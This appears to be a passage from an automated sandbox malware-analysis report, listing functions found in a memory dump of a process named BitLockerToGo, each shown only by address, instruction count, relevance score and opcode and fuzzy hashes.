                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: c89cbbae6080b897795ba868420088b9ca5705a8f5494533a875fa2fabb0191b
                                                                                                                                                                  • Instruction ID: 28809242f077f8fa2fd43d2381955a98943efc9967d710f26c8a740cc37279e9
                                                                                                                                                                  • Opcode Fuzzy Hash: c89cbbae6080b897795ba868420088b9ca5705a8f5494533a875fa2fabb0191b
                                                                                                                                                                  • Instruction Fuzzy Hash: FB81BF74209301ABD724DF28E8A0A6BB7E1FF89744F55891CE985CB791E731EC50CB52
                                                                                                                                                                  Function 02D18370 Relevance: .3, Instructions: 262COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 864a930cc9daf9115f175a838d19c1e3022b1a0e6d18542e50f45930f0712f7a
                                                                                                                                                                  • Instruction ID: b4bca98f86b6033cdce7f55268d18e3a484bdfa0a670d4710150e871b01f0fd9
                                                                                                                                                                  • Opcode Fuzzy Hash: 864a930cc9daf9115f175a838d19c1e3022b1a0e6d18542e50f45930f0712f7a
                                                                                                                                                                  • Instruction Fuzzy Hash: 9C91DD75A4C240DFD354DF28E49061AB7E1FB9A315F0A8CACD98997740D339EC68DB41
                                                                                                                                                                  Function 02CF7C20 Relevance: .3, Instructions: 262COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 1e7b767010893ddeb202bda9b0e063cf16f0f3bfb930368979203e84db47568c
                                                                                                                                                                  • Instruction ID: cd8826f0d0f592f2358e3d0b1268f6add7f3ef89eccceac6d8d0e5111bf0ca64
                                                                                                                                                                  • Opcode Fuzzy Hash: 1e7b767010893ddeb202bda9b0e063cf16f0f3bfb930368979203e84db47568c
                                                                                                                                                                  • Instruction Fuzzy Hash: F2917D75A08202DFE754DF24E890B6AB3E9FF98315F0A496CE98587340D734ED68CB51
                                                                                                                                                                  Function 02CF7E26 Relevance: .2, Instructions: 250COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 9380399e4221f45d27ebcc32b32b6c74f211ffa1afc729d0fd3acc038a03579c
                                                                                                                                                                  • Instruction ID: e82d1e4483ea7703aa5896562e591d33cbe682d0e1a7d7391a3b22134bd89288
                                                                                                                                                                  • Opcode Fuzzy Hash: 9380399e4221f45d27ebcc32b32b6c74f211ffa1afc729d0fd3acc038a03579c
                                                                                                                                                                  • Instruction Fuzzy Hash: 17916A35A18202DFE754DF28E89076AB3E9FF98316F0A486CE98587341D734ED68CB51
                                                                                                                                                                  Function 02CD6420 Relevance: .2, Instructions: 229COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 0e511da1d023be4f9311503bd1b7d668afce91a3cfb28f0ec7d3cd720e542957
                                                                                                                                                                  • Instruction ID: 8185247af7f8c2b1aeb266faaa80113261a9080d31535d803eb1690772a1ed1c
                                                                                                                                                                  • Opcode Fuzzy Hash: 0e511da1d023be4f9311503bd1b7d668afce91a3cfb28f0ec7d3cd720e542957
                                                                                                                                                                  • Instruction Fuzzy Hash: E5713B315483818FE7158E28E8513677BE9EF82208F38897DDACACB385E375D946C791
                                                                                                                                                                  Function 02CE4CF8 Relevance: .2, Instructions: 205COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: b9fcb81810c4c8307f44bab193f9b6eb207a91ce2461ed9b8f2f818275158c9c
                                                                                                                                                                  • Instruction ID: 106c4de26f62d5a742975c0577a4cfa4e23a89c3863dcc17e6909601214ed997
                                                                                                                                                                  • Opcode Fuzzy Hash: b9fcb81810c4c8307f44bab193f9b6eb207a91ce2461ed9b8f2f818275158c9c
                                                                                                                                                                  • Instruction Fuzzy Hash: 8B514A706007418FDB3A9F29C880B27B7F6AF89314F248A6DD0AB87750E774E945CB95
                                                                                                                                                                  Function 02D07A00 Relevance: .2, Instructions: 204COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 8c7abce5c5f7ab1fe8450decd13573bc729a29e5b9153926aac70728a59fbdfc
                                                                                                                                                                  • Instruction ID: c3ff5f565ad68220955c9ff24ee4f3656c324c66749477b4c6c868ef16639777
                                                                                                                                                                  • Opcode Fuzzy Hash: 8c7abce5c5f7ab1fe8450decd13573bc729a29e5b9153926aac70728a59fbdfc
                                                                                                                                                                  • Instruction Fuzzy Hash: E7510633B4A9914BF328883D5CA13AAEA834BD6234F2D976AD4F54F3E1D5659C02C351
                                                                                                                                                                  Function 02CFCD80 Relevance: .2, Instructions: 204COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 39148704f5411def39d41399c0b50f349c510afd46f1834384ad0b9fc0f3ab1b
                                                                                                                                                                  • Instruction ID: 47530da2ddaf6a0734ca783ae1920cf508e55e57d3f9068cc1390144744a3510
                                                                                                                                                                  • Opcode Fuzzy Hash: 39148704f5411def39d41399c0b50f349c510afd46f1834384ad0b9fc0f3ab1b
                                                                                                                                                                  • Instruction Fuzzy Hash: 7F51C577B14A110BD75DC929C87173EB5935BC8220F5CC63EE96B8B3DAEB3099158281
                                                                                                                                                                  Function 02D077C0 Relevance: .2, Instructions: 202COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 824e5ff18a77033ae72fac51b5cbe15ae232342a480dbc760ad134b1510f14fe
                                                                                                                                                                  • Instruction ID: efe46e9e75763f0cba6ebaf482196de392631fa08c2aa2c312ab8d463448cfab
                                                                                                                                                                  • Opcode Fuzzy Hash: 824e5ff18a77033ae72fac51b5cbe15ae232342a480dbc760ad134b1510f14fe
                                                                                                                                                                  • Instruction Fuzzy Hash: 6C51E333A5A5D046E714493D5C813B9EA171BE7234B3E8366A8F18F3E1C666DC12C391
                                                                                                                                                                  Function 02D13E30 Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: acece101d991fd88545e1eacf96e568cccd0dd0d67afc87e52e81b8ca9d8e753
                                                                                                                                                                  • Instruction ID: 607415693c8478b91c38fcf58539404ebb78f5f9ec85f4b9e72bd7296361b097
                                                                                                                                                                  • Opcode Fuzzy Hash: acece101d991fd88545e1eacf96e568cccd0dd0d67afc87e52e81b8ca9d8e753
                                                                                                                                                                  • Instruction Fuzzy Hash: B361AB7060C341BBE7659E15E880B2AFBE2EB84314F58899CF5D9877A1D331EC54CB52
                                                                                                                                                                  Function 02D0D850 Relevance: .2, Instructions: 189COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 0c74a5fcb78ba7649df40a37d0d90475295fc2b447c5cb1f91e2738a5b779dff
                                                                                                                                                                  • Instruction ID: 0fed61a014119ff398050d21b89a3a03a82f4450d2c851ebb4a657f90a182dae
                                                                                                                                                                  • Opcode Fuzzy Hash: 0c74a5fcb78ba7649df40a37d0d90475295fc2b447c5cb1f91e2738a5b779dff
                                                                                                                                                                  • Instruction Fuzzy Hash: E55129B59087548FE314DF69D49475BBBE1FB84318F044A2EE4E987390E379DA088F92
                                                                                                                                                                  Function 02CD59A0 Relevance: .2, Instructions: 163COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 2d5a1846498a42bc51e2ff74031b3bd03fa420b200d817e6b26b646e949b1595
                                                                                                                                                                  • Instruction ID: 710c72c8572e3f1ca500ced4828d55e89724bfc3fb39536696c9dc50464ce5e5
                                                                                                                                                                  • Opcode Fuzzy Hash: 2d5a1846498a42bc51e2ff74031b3bd03fa420b200d817e6b26b646e949b1595
                                                                                                                                                                  • Instruction Fuzzy Hash: F051F5B5A04210AFC714DF18C480926B7E1FFC53A8F55466DE9999B341D731ED42CF92
                                                                                                                                                                  Function 02D12D50 Relevance: .2, Instructions: 155COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 3f0fac1f312cca1b85d3a0f9d450b19f01d606ac6d67a966d2ea7a6c87dc9628
                                                                                                                                                                  • Instruction ID: aeabc11c972ab5be1ce4b84a63bbc0dc36474f0059850e452dcc711cad82189b
                                                                                                                                                                  • Opcode Fuzzy Hash: 3f0fac1f312cca1b85d3a0f9d450b19f01d606ac6d67a966d2ea7a6c87dc9628
                                                                                                                                                                  • Instruction Fuzzy Hash: E6419334608210ABD724DF55F988A2BBBE6EF95748F18881DE8C597B51D332DC50CB62
                                                                                                                                                                  Function 02CF7A42 Relevance: .2, Instructions: 154COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: b62df8cef0e06b0bdef5f6e2dd56eac50627ae65cfae5fc220234147862f8b18
                                                                                                                                                                  • Instruction ID: ff2ee05c8ed0d517feb9b8f8b2d6c480f3b72b05b25614a38ca36f480b10f3de
                                                                                                                                                                  • Opcode Fuzzy Hash: b62df8cef0e06b0bdef5f6e2dd56eac50627ae65cfae5fc220234147862f8b18
                                                                                                                                                                  • Instruction Fuzzy Hash: 37516E35A59202DBE794CF28D89072AB3E6FFA8301F4A496CE98587381D734E964CB51
                                                                                                                                                                  Function 02CF7A60 Relevance: .2, Instructions: 154COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: cab689a3d6124fa7cde93cf1a817fe458b5f2b6c7b3a6e7e192b19f17f96ac4d
                                                                                                                                                                  • Instruction ID: 6082e00ea873bf723de9d95f6a9198e5d175636264812f6ed6f412f06242800f
                                                                                                                                                                  • Opcode Fuzzy Hash: cab689a3d6124fa7cde93cf1a817fe458b5f2b6c7b3a6e7e192b19f17f96ac4d
                                                                                                                                                                  • Instruction Fuzzy Hash: 2B516E35A59302DBE794CF28D890B2AB3E6FFA8305F0A496CE98587341D734ED64CB51
                                                                                                                                                                  Function 02D19650 Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: c4f8d0b21de18b8fe8dae0eb10908dd0fa254076703653f75569344a3542f5c6
                                                                                                                                                                  • Instruction ID: 0208504be5458acb8a3a483d4889f01b22323b9fa00b9293ab40006e492dc80b
                                                                                                                                                                  • Opcode Fuzzy Hash: c4f8d0b21de18b8fe8dae0eb10908dd0fa254076703653f75569344a3542f5c6
                                                                                                                                                                  • Instruction Fuzzy Hash: F241AC74608340BBD7249E14E8A0B6BB7A6EF85718F288C1CE58987781D375EC10CB66
                                                                                                                                                                  Function 02D13230 Relevance: .1, Instructions: 136COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 3342e99d5925f9d6083c26b509aee6e0aa8d7e90d3e6fee579aefa229c6851f4
                                                                                                                                                                  • Instruction ID: dec2662ba4c921ac78e6c3c990fc1b20347a6da8c38b531f605d97a325972ae4
                                                                                                                                                                  • Opcode Fuzzy Hash: 3342e99d5925f9d6083c26b509aee6e0aa8d7e90d3e6fee579aefa229c6851f4
                                                                                                                                                                  • Instruction Fuzzy Hash: 3D41AC35608240FBDB69EF58F840A6BBBA6EF85344F14885CE8C593B51D731DC20DB62
                                                                                                                                                                  Function 02D197E0 Relevance: .1, Instructions: 136COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 08baba8904cc8b62b9bc87199c71a59b8d9c0fedf58ebdf0d62449cd7eea5540
                                                                                                                                                                  • Instruction ID: 6a125fb5b49c5353bf99df0640e708db9ee3d9fe8721565cb64a63820832dde6
                                                                                                                                                                  • Opcode Fuzzy Hash: 08baba8904cc8b62b9bc87199c71a59b8d9c0fedf58ebdf0d62449cd7eea5540
                                                                                                                                                                  • Instruction Fuzzy Hash: 2141AE74608300BBD7249E14E8A0B6BB7E6EF85714F64981CF5C997781D375EC10CB66
                                                                                                                                                                  Function 02CE0E50 Relevance: .1, Instructions: 122COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 9a6e061b5493cf97cf40694972745a3a86c68766b85ad55b7997154b752623c9
                                                                                                                                                                  • Instruction ID: e22dca14e2885f024af009c606bd6bd1029bac368ae76811fb5642cda27ac1d9
                                                                                                                                                                  • Opcode Fuzzy Hash: 9a6e061b5493cf97cf40694972745a3a86c68766b85ad55b7997154b752623c9
                                                                                                                                                                  • Instruction Fuzzy Hash: F1410432A1C3914FD318DE3A889012ABBD2ABC5214F49C63DF0E6877C4E6758905D791
                                                                                                                                                                  Function 02D0ECB0 Relevance: .1, Instructions: 109COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 0859ab5bef15108ddf6a50457199b2037f3be541f272c139ff6e350865aa4766
                                                                                                                                                                  • Instruction ID: f54a8df05cdcda5aa4d924447c08e4085c4d2a7490799be77fd3079519f55461
                                                                                                                                                                  • Opcode Fuzzy Hash: 0859ab5bef15108ddf6a50457199b2037f3be541f272c139ff6e350865aa4766
                                                                                                                                                                  • Instruction Fuzzy Hash: 6331D932A087144BD3198D398CD036A7793EBC6230F198B3DEAB64B3D5DA759C458265
                                                                                                                                                                  Function 02CE4471 Relevance: .1, Instructions: 105COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: b104c4645d9c2d00e1f293715f3a0eeee49bb52aa220af98817134b807efeb8e
                                                                                                                                                                  • Instruction ID: 4938bc8a8e569539930e86e7ca292e97fa72974ea8813495079c3fb474caa937
                                                                                                                                                                  • Opcode Fuzzy Hash: b104c4645d9c2d00e1f293715f3a0eeee49bb52aa220af98817134b807efeb8e
                                                                                                                                                                  • Instruction Fuzzy Hash: EC31A9B1A00B009FDB399F64E880B23B7F6BF4A314F185929D18B83A51E730E441CB58
                                                                                                                                                                  Function 02CD4970 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 2c8dcb8906ed68d0e104999a025abfeca4d592c94a6e2ef97f3ecd775cc418bd
                                                                                                                                                                  • Instruction ID: 7fd52a6abc86c3d264cd177942e12fa10162a66f6d34d3032e4bc1f49377b8a4
                                                                                                                                                                  • Opcode Fuzzy Hash: 2c8dcb8906ed68d0e104999a025abfeca4d592c94a6e2ef97f3ecd775cc418bd
                                                                                                                                                                  • Instruction Fuzzy Hash: 1E31AC716042019BD7289E5AC880A3AB7E9FFC5319F188A2DEBD9D7341D331D952CB42
                                                                                                                                                                  Function 02CDC7C0 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 3e8f3b75875f45d504a6dc89fc1b9fcb22a39d16c83cc7a51be08e0b2d806dfc
                                                                                                                                                                  • Instruction ID: c9518075e3e8b620ec1596b7a3a84a400ceb3289bf6fbae9bed37290ce2de2fa
                                                                                                                                                                  • Opcode Fuzzy Hash: 3e8f3b75875f45d504a6dc89fc1b9fcb22a39d16c83cc7a51be08e0b2d806dfc
                                                                                                                                                                  • Instruction Fuzzy Hash: EF21066194DAD35E8326896D4890477FFE16DE600A30DC3BED8F987B43D114DA44C3E1
                                                                                                                                                                  Function 02D09D50 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                  • Instruction ID: d338c8c3bf022bad8e8a2108e90c59793ac98b91787ad3d2ecb0d9b3839518d2
                                                                                                                                                                  • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                  • Instruction Fuzzy Hash: 3111A332A451E40AC3168D3C84506A5BFA21A93934B594399E4B49B2E3D622DD8AC364
                                                                                                                                                                  Function 02CFFA20 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 27a7a612ae88423c94e94aed23f2f5e59f19f6e9562c51202233e4b369826d55
                                                                                                                                                                  • Instruction ID: 6ef11810e51b189f7296eca09a8d2f0ecdf9141e77a1caab519ff61a2d638688
                                                                                                                                                                  • Opcode Fuzzy Hash: 27a7a612ae88423c94e94aed23f2f5e59f19f6e9562c51202233e4b369826d55
                                                                                                                                                                  • Instruction Fuzzy Hash: F10184F1B4030147E7A0DF54D4C072BB2A9EFC4718F19443CDA0A97B91DB75EA15DA91
                                                                                                                                                                  Function 02D0739F Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 8a3b4a7cc5d26bea5e0484f30bce549a2fe35a875b1bfd3b42ec138a3273e8a3
                                                                                                                                                                  • Instruction ID: c0141a9e59c61e066c4a1f3e05571b14ba6d0921d6d1dbd7c07d648b3562aaf3
                                                                                                                                                                  • Opcode Fuzzy Hash: 8a3b4a7cc5d26bea5e0484f30bce549a2fe35a875b1bfd3b42ec138a3273e8a3
                                                                                                                                                                  • Instruction Fuzzy Hash: 5BF0E8F0524200AEE610BA3CCE1AB6B7AACAB40214F404A48FC6597695E2705C1487E2
                                                                                                                                                                  Function 02CEA590 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
